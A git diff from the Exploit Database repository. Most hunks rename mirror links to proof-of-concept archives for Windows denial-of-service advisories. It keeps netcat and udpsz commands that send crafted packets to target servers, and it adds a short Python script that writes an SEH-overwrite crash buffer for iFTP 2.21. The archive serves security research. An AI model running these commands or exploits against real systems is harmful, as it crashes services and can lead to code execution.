b/platforms/windows/dos/16254.txt @@ -44,7 +44,7 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4999.php -------- PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nitropdf_poc.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/16254.rar (nitropdf_poc.rar) http://www.zeroscience.mk/codes/nitropdf_poc.rar -------- \ No newline at end of file diff --git a/platforms/windows/dos/17023.txt b/platforms/windows/dos/17023.txt index bbe086c3d..832c324fe 100755 --- a/platforms/windows/dos/17023.txt +++ b/platforms/windows/dos/17023.txt @@ -13,8 +13,8 @@ http://aluigi.org/adv/genesis_11-adv.txt http://aluigi.org/adv/genesis_12-adv.txt http://aluigi.org/adv/genesis_13-adv.txt -Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/iconics_genesis_adv.tar.gz -PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/iconics_genesis_poc.tar.gz +Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-adv.tar.gz (iconics_genesis_adv.tar.gz) +PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-poc.tar.gz (iconics_genesis_poc.tar.gz) ####################################################################### @@ -105,7 +105,7 @@ The Code =========== http://aluigi.org/poc/genesis_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-1.zip (genesis_1.zip) ####################################################################### @@ -157,7 +157,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 1 SERVER @@ -212,7 +212,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 2 SERVER @@ -280,7 +280,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 3 SERVER @@ -339,7 +339,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 4 SERVER @@ -388,7 +388,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 5 SERVER @@ -437,7 +437,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 6 SERVER @@ -486,7 +486,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 7 SERVER @@ -529,7 +529,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 8 SERVER @@ -574,7 +574,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 9 SERVER @@ -625,7 +625,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 10 SERVER @@ -673,7 +673,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 11 SERVER @@ -718,7 +718,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip) genesis_iof 12 SERVER diff --git a/platforms/windows/dos/17025.txt b/platforms/windows/dos/17025.txt index af11e54c5..864521208 100755 --- a/platforms/windows/dos/17025.txt +++ b/platforms/windows/dos/17025.txt @@ -7,8 +7,8 @@ http://aluigi.org/adv/realwin_6-adv.txt http://aluigi.org/adv/realwin_7-adv.txt http://aluigi.org/adv/realwin_8-adv.txt -Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/datac_realwin_adv.tar.gz -PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/datac_realwin_poc.tar.gz +Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-adv.tar.gz (datac_realwin_adv.tar.gz) +PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-poc.tar.tz (datac_realwin_poc.tar.gz) ####################################################################### @@ -54,7 +54,7 @@ The Code =========== http://aluigi.org/poc/realwin_2.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_2.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-2.zip (realwin_2.zip) nc SERVER 910 < realwin_2.dat @@ -89,7 +89,7 @@ The Code =========== http://aluigi.org/poc/realwin_3.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_3.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-3.zip (realwin_3.zip) nc SERVER 910 < realwin_3?.dat @@ -113,7 +113,7 @@ The Code =========== http://aluigi.org/poc/realwin_4.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_4.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-4.zip (realwin_4.zip) nc SERVER 910 < realwin_4.dat @@ -151,7 +151,7 @@ The Code =========== http://aluigi.org/poc/realwin_5.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_5.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-5.zip (realwin_5.zip) nc SERVER 910 < realwin_5?.dat @@ -186,7 +186,7 @@ The Code =========== http://aluigi.org/poc/realwin_6.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_6.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-6.zip (realwin_6.zip) nc SERVER 910 < realwin_6?.dat @@ -227,7 +227,7 @@ The Code =========== http://aluigi.org/poc/realwin_7.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_7.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-7.zip (realwin_7.zip) nc SERVER 910 < realwin_7?.dat @@ -251,7 +251,7 @@ The Code =========== http://aluigi.org/poc/realwin_8.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_8.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-8.zip (realwin_8.zip) nc SERVER 910 < realwin_8.dat diff --git a/platforms/windows/dos/1708.txt b/platforms/windows/dos/1708.txt index 3f415759e..5629a0043 100755 --- a/platforms/windows/dos/1708.txt +++ b/platforms/windows/dos/1708.txt @@ -16,6 +16,6 @@ Author: Luigi Auriemma ####################################################################### -Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04232006-skulltagfs.zip +Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1708.zip (04232006-skulltagfs.zip) # milw0rm.com [2006-04-23] diff --git a/platforms/windows/dos/17398.txt b/platforms/windows/dos/17398.txt index 0bcf4b09b..3f175e6a5 100755 --- a/platforms/windows/dos/17398.txt +++ b/platforms/windows/dos/17398.txt @@ -15,7 +15,7 @@ playlist and the media player will try to generate thumbnail image of the contents. File at: http://www.deventum.com/research/Crash_WMplayer.3gp -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Crash_WMplayer.3gp +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17398.3gp (Crash_WMplayer.3gp) Debug info, diff --git a/platforms/windows/dos/17399.txt b/platforms/windows/dos/17399.txt index a181213ec..6c5ebc179 100755 --- a/platforms/windows/dos/17399.txt +++ b/platforms/windows/dos/17399.txt @@ -85,5 +85,5 @@ winword!wdGetApplicationObject+0x150fac: 4) POC =========== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL-2011-07.doc +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17399.doc (PRL-2011-07.doc) http://www.protekresearchlab.com/exploits/PRL-2011-07.doc \ No newline at end of file diff --git a/platforms/windows/dos/17497.txt b/platforms/windows/dos/17497.txt index 78d1e36c0..494fdc436 100755 --- a/platforms/windows/dos/17497.txt +++ b/platforms/windows/dos/17497.txt @@ -43,4 +43,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5023.php PoC: - http://www.zeroscience.mk/codes/alplayer_bof.rar - - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/alplayer_bof.rar + - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17497.rar (alplayer_bof.rar) diff --git a/platforms/windows/dos/17544.txt b/platforms/windows/dos/17544.txt index 6aaffa1d9..ecc300073 100755 --- a/platforms/windows/dos/17544.txt +++ b/platforms/windows/dos/17544.txt @@ -166,6 +166,6 @@ corruptions using a standalone file. . feel free to contact us at : info [at] abysssec.com PoC link : http://abysssec.com/files/GDI_PoC.zip -PoC Mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/GDI_PoC.zip +PoC Mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17544.zip (GDI_PoC.zip) diff --git a/platforms/windows/dos/17772.txt b/platforms/windows/dos/17772.txt index 2a0f139a9..5f6c56676 100755 --- a/platforms/windows/dos/17772.txt +++ b/platforms/windows/dos/17772.txt @@ -69,7 +69,7 @@ fwrite(). http://aluigi.org/poc/bwocxrun_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/bwocxrun_1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17772.zip (bwocxrun_1.zip) ####################################################################### diff --git a/platforms/windows/dos/1781.txt b/platforms/windows/dos/1781.txt index 2741dc613..a18cf0367 100755 --- a/platforms/windows/dos/1781.txt +++ b/platforms/windows/dos/1781.txt @@ -1,5 +1,5 @@ # Outgun <= 1.0.3 bot 2 Multiple Remote Vulnerabilities Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05132006-outgunx.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1781.zip (05132006-outgunx.zip) # milw0rm.com [2006-05-14] diff --git a/platforms/windows/dos/1782.txt b/platforms/windows/dos/1782.txt index 0e66db3e8..d9feaadc5 100755 --- a/platforms/windows/dos/1782.txt +++ b/platforms/windows/dos/1782.txt @@ -1,5 +1,5 @@ # Empire <= 4.3.2 (strncat) Denial of Service Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05132006-empiredos.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1782.zip (05132006-empiredos.zip) # milw0rm.com [2006-05-14] diff --git a/platforms/windows/dos/1783.txt b/platforms/windows/dos/1783.txt index 71e91a316..c27eb9390 100755 --- a/platforms/windows/dos/1783.txt +++ b/platforms/windows/dos/1783.txt @@ -1,5 +1,5 @@ # Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05132006-genecysbof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip (05132006-genecysbof.zip) # milw0rm.com [2006-05-14] diff --git a/platforms/windows/dos/17830.txt b/platforms/windows/dos/17830.txt index 879d94135..4285c6cfa 100755 --- a/platforms/windows/dos/17830.txt +++ b/platforms/windows/dos/17830.txt @@ -208,7 +208,7 @@ flow and executing code under SYSTEM privileges. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/udpsz.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17830.zip (udpsz.zip) udpsz -C 00140004 -b a -l 0 -T 0xffffffff SERVER 42 0x140008 diff --git a/platforms/windows/dos/1784.txt b/platforms/windows/dos/1784.txt index ca61ecf22..135cc6679 100755 --- a/platforms/windows/dos/1784.txt +++ b/platforms/windows/dos/1784.txt @@ -1,5 +1,5 @@ # Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05132006-raydiumx.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip) diff --git a/platforms/windows/dos/17918.txt b/platforms/windows/dos/17918.txt index 99fe3cf41..83a450ff6 100755 --- a/platforms/windows/dos/17918.txt +++ b/platforms/windows/dos/17918.txt @@ -114,6 +114,6 @@ REF #2: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4940.php Proof Of Concept: ----------------- http://www.zeroscience.mk/codes/brush_gradiently.rar (11071 bytes) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/brush_gradiently.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17918.rar (brush_gradiently.rar) diff --git a/platforms/windows/dos/1792.txt b/platforms/windows/dos/1792.txt index f3d55565b..037b7e756 100755 --- a/platforms/windows/dos/1792.txt +++ b/platforms/windows/dos/1792.txt @@ -1,3 +1,3 @@ # GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05152006-udpsz.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1792.zip (05152006-udpsz.zip) diff --git a/platforms/windows/dos/17978.txt b/platforms/windows/dos/17978.txt index aa205c28d..d97fc582e 100755 --- a/platforms/windows/dos/17978.txt +++ b/platforms/windows/dos/17978.txt @@ -9,7 +9,7 @@ Exploit is downloadable from: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/my.fon.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17978.tar.gz (my.fon.tar.gz) http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/ diff --git a/platforms/windows/dos/18488.txt b/platforms/windows/dos/18488.txt index 6aa44fb9f..ab54e0db2 100755 --- a/platforms/windows/dos/18488.txt +++ b/platforms/windows/dos/18488.txt @@ -76,7 +76,7 @@ to change the NM_A_PARM1 field if you want to use another one. http://aluigi.org/poc/nmma_x.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nmma_x.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18488.zip (nmma_x.zip) nmma_x 3 SERVER diff --git a/platforms/windows/dos/18489.txt b/platforms/windows/dos/18489.txt index ff4d8d9b1..1c6dc156c 100755 --- a/platforms/windows/dos/18489.txt +++ b/platforms/windows/dos/18489.txt @@ -72,7 +72,7 @@ service is multi-thread) may be possible to control the corruption. http://aluigi.org/poc/nmma_x.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nmma_x.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18489.zip (nmma_x.zip) nmma_x 1 SERVER diff --git a/platforms/windows/dos/18586.txt b/platforms/windows/dos/18586.txt index 65492bfa9..1f850eed4 100755 --- a/platforms/windows/dos/18586.txt +++ b/platforms/windows/dos/18586.txt @@ -58,4 +58,4 @@ an heap-based buffer overflow by tricking a user into opening a specially crafte =========== Here: http://www.protekresearchlab.com/exploits/PRL-2012-06.fpx -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL-2012-06.fpx \ No newline at end of file +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18586.pfx (PRL-2012-06.fpx) \ No newline at end of file diff --git a/platforms/windows/dos/20946.txt b/platforms/windows/dos/20946.txt index a3cc14116..473493f44 100755 --- a/platforms/windows/dos/20946.txt +++ b/platforms/windows/dos/20946.txt @@ -10,4 +10,4 @@ Due to the fact that the problem stems from a buffer overflow, there is a possib This vulnerability does not require any user authentication to exploit. It may be possible for remote users to cause a denial of service or execute arbitrary code on target hosts. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20946.EXE \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20946.exe \ No newline at end of file diff --git a/platforms/windows/dos/22680.txt b/platforms/windows/dos/22680.txt index b0250c7a2..10942f4af 100755 --- a/platforms/windows/dos/22680.txt +++ b/platforms/windows/dos/22680.txt @@ -56,4 +56,4 @@ a heap-based buffer overflow via a specially crafted BMP image containing many ============= http://protekresearchlab.com/exploits/PRL-2012-32.rle -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL-2012-32.rle.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22680.tar.gz (PRL-2012-32.rle.tar.gz) diff --git a/platforms/windows/dos/22681.txt b/platforms/windows/dos/22681.txt index 528dd791f..cd4f31559 100755 --- a/platforms/windows/dos/22681.txt +++ b/platforms/windows/dos/22681.txt @@ -55,5 +55,5 @@ heap-based buffer overflow via a specially crafted "ImageWidth" value. ============= http://protekresearchlab.com/exploits/PRL-2012-31.tif -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL-2012-31.tif.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22681.tif.tar.gz (PRL-2012-31.tif.tar.gz) diff --git a/platforms/windows/dos/2922.txt b/platforms/windows/dos/2922.txt index 6174f8dd4..66d7f22c5 100755 --- a/platforms/windows/dos/2922.txt +++ b/platforms/windows/dos/2922.txt @@ -27,6 +27,6 @@ bug hugs, disco. -poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12122006-djtest.doc +poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2922.doc (12122006-djtest.doc) # milw0rm.com [2006-12-12] diff --git a/platforms/windows/dos/312.txt b/platforms/windows/dos/312.txt index 7e351c1c1..60f297a53 100755 --- a/platforms/windows/dos/312.txt +++ b/platforms/windows/dos/312.txt @@ -20,7 +20,7 @@ Then, in this situation the only alternate is to kill the process. --- [Proof of Concept] --- Please download this file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/av_bomb_3.zip <--- For symantec. +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/312.zip (av_bomb_3.zip) <--- For symantec. The file contains, 'EICAR Test String' burried in 49647 directories. This is just a RAW 'proof of concept'. A few 100kb's of compressed file could be crafted in a way... NAV will take hours or MIGHT even days to complete the scan causing 100% cup use in email gateways for hours. The compressed archive must not necessarily be a '.zip' to trigger this attack. diff --git a/platforms/windows/dos/31360.txt b/platforms/windows/dos/31360.txt index 527748023..3737d9051 100755 --- a/platforms/windows/dos/31360.txt +++ b/platforms/windows/dos/31360.txt @@ -9,5 +9,5 @@ An attacker may leverage these issues to execute arbitrary code in the context o These issues affect MailEnable 3.13; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31360_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31360_2.pl \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31360-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31360-2.pl \ No newline at end of file diff --git a/platforms/windows/dos/3399.txt b/platforms/windows/dos/3399.txt index d70f4a170..c097731bf 100755 --- a/platforms/windows/dos/3399.txt +++ b/platforms/windows/dos/3399.txt @@ -74,7 +74,7 @@ void new_warning(int index, const char *fmt, ...) { =========== http://aluigi.org/poc/netrekfs.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/03022007-netrekfs.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3399.zip (03022007-netrekfs.zip) ####################################################################### diff --git a/platforms/windows/dos/3419.txt b/platforms/windows/dos/3419.txt index b57fd7ad3..05896e380 100755 --- a/platforms/windows/dos/3419.txt +++ b/platforms/windows/dos/3419.txt @@ -19,6 +19,6 @@ * Coded by Marsu * \*****************************************************************************/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/03062007-Explorer_Crasher.tar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3419.tar (03062007-Explorer_Crasher.tar) # milw0rm.com [2007-03-06] diff --git a/platforms/windows/dos/3690.txt b/platforms/windows/dos/3690.txt index 65a79a6a2..41df29480 100755 --- a/platforms/windows/dos/3690.txt +++ b/platforms/windows/dos/3690.txt @@ -26,7 +26,7 @@ file613-1.doc - Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100 %, a These files can be found at http://www.offensive-security.com/0day/0day.tar.gz -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04092007-0day.tar.gz +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3690.tar.gz (04092007-0day.tar.gz) Be safe, diff --git a/platforms/windows/dos/3693.txt b/platforms/windows/dos/3693.txt index f86992a78..656751d3e 100755 --- a/platforms/windows/dos/3693.txt +++ b/platforms/windows/dos/3693.txt @@ -1,5 +1,5 @@ MS Windows .HLP File Local HEAP Overflow PoC 0day -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04092007-evil1.hlp.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3693.hlp.tgz (04092007-evil1.hlp.tgz) # milw0rm.com [2007-04-09] diff --git a/platforms/windows/dos/37014.py b/platforms/windows/dos/37014.py new file mode 100755 index 000000000..5ed7e2f49 --- /dev/null +++ b/platforms/windows/dos/37014.py @@ -0,0 +1,25 @@ +#!/usr/bin/python +########################################################################################### +#Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC +#Author: dogo h@ck +#Date Discovered : 12-5-2015 +#Vendor Homepage: http://www.memecode.com/iftp.php +#Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe +#Version: 2.21 +#Tested on : Windows XP Sp3 +########################################################################################### +#Crash : Go to Connect > Host Address > Post it +#Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&^% :( ) +############################################################################################ + +buffer = "A"*1865 +buffer +="BBBB" #Pointer to next SEH record +buffer +="CCCC" #SE handler +buffer +="D"*500 +file = "buffer.txt" + +f = open(file, "w") + +f.write(buffer) + +f.close() diff --git a/platforms/windows/dos/4044.txt b/platforms/windows/dos/4044.txt index 5f50f097c..4f102b7d0 100755 --- a/platforms/windows/dos/4044.txt +++ b/platforms/windows/dos/4044.txt @@ -5,6 +5,6 @@ #################################### highsecu.ico - Microsoft GDI+ Integer division by zero flaw handling .ICO files -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/06072007-CVE-2007-2237.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4044.zip (06072007-CVE-2007-2237.zip) # milw0rm.com [2007-06-07] diff --git a/platforms/windows/dos/4121.txt b/platforms/windows/dos/4121.txt index 3e74715f1..160cb3842 100755 --- a/platforms/windows/dos/4121.txt +++ b/platforms/windows/dos/4121.txt @@ -4,6 +4,6 @@ http://www.ph4nt0m.org Tested on: Full Patched Excel 2003 Sp2, CN -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/06272007-2670.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip (06272007-2670.zip) # milw0rm.com [2007-06-27] diff --git a/platforms/windows/dos/4335.txt b/platforms/windows/dos/4335.txt index c363d1340..3a0be0d74 100755 --- a/platforms/windows/dos/4335.txt +++ b/platforms/windows/dos/4335.txt @@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit 3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process. 4 . the otherside's yahoo! messenger will be crashed. -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/08292007-expyahoo.rar +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar) # milw0rm.com [2007-08-29] diff --git a/platforms/windows/dos/4375.txt b/platforms/windows/dos/4375.txt index ecd4a2022..df9d7cddb 100755 --- a/platforms/windows/dos/4375.txt +++ b/platforms/windows/dos/4375.txt @@ -1,5 +1,5 @@ BaoFeng2 Mps.dll Activex Multiple Remote Buffer Overflow PoC -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/09082007-storm.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4375.zip (09082007-storm.zip) # milw0rm.com [2007-09-08] diff --git a/platforms/windows/dos/5327.txt b/platforms/windows/dos/5327.txt index bb45542a1..4660fb577 100755 --- a/platforms/windows/dos/5327.txt +++ b/platforms/windows/dos/5327.txt @@ -8,6 +8,6 @@ Download the file anywhere excluding on desktop and try to browse it with the Wi - Website - http://iron-team.com/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-Iron.Team.hack.the.planet.doc +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5327.doc (2008-Iron.Team.hack.the.planet.doc) # milw0rm.com [2008-03-31] diff --git a/platforms/windows/dos/5687.txt b/platforms/windows/dos/5687.txt index 6a3bfe5b3..c439086dc 100755 --- a/platforms/windows/dos/5687.txt +++ b/platforms/windows/dos/5687.txt @@ -4,6 +4,6 @@ the reader deadly crash when a malformed Pdf file is opened: greetz to : Deimos, benjilenoob, Berga , http://spiritofhack.net/ -Poc : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-HI2.pdf +Poc : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5687.pdf (2008-HI2.pdf) # milw0rm.com [2008-05-29] diff --git a/platforms/windows/dos/6330.txt b/platforms/windows/dos/6330.txt index c82e2a184..662eab9a1 100755 --- a/platforms/windows/dos/6330.txt +++ b/platforms/windows/dos/6330.txt @@ -21,6 +21,6 @@ and causes Internet explorer to close silently. This is work in progress , i am still trying to make it run arbitary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-EMF_DOS.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6330.rar (2008-EMF_DOS.rar) # milw0rm.com [2008-08-29] diff --git a/platforms/windows/dos/6560.txt b/platforms/windows/dos/6560.txt index f0c42ed96..83c5b4483 100755 --- a/platforms/windows/dos/6560.txt +++ b/platforms/windows/dos/6560.txt @@ -1,6 +1,6 @@ MS Windows Wordpad .doc File Local Denial of Service PoC author: securfrog -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-crash.doc.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6560.rar (2008-crash.doc.rar) # milw0rm.com [2008-09-25] diff --git a/platforms/windows/dos/6565.txt b/platforms/windows/dos/6565.txt index e08d0ed79..2b7014f4c 100755 --- a/platforms/windows/dos/6565.txt +++ b/platforms/windows/dos/6565.txt @@ -20,6 +20,6 @@ By: Aodrulez, Email: f3arm3d3ar@gmail.com ------------------------------------------------------------------ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-test7.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6565.rar (2008-test7.rar) # milw0rm.com [2008-09-25] diff --git a/platforms/windows/dos/6616.txt b/platforms/windows/dos/6616.txt index 74fa78c8c..de8f6b35a 100755 --- a/platforms/windows/dos/6616.txt +++ b/platforms/windows/dos/6616.txt @@ -10,6 +10,6 @@ EBP 0007E358 Access Violation [FFFFFFFF] ---| -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ExplorerDOS.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6616.zip (2008-ExplorerDOS.zip) # milw0rm.com [2008-09-28] diff --git a/platforms/windows/dos/6658.txt b/platforms/windows/dos/6658.txt index a930be4c0..10ca75345 100755 --- a/platforms/windows/dos/6658.txt +++ b/platforms/windows/dos/6658.txt @@ 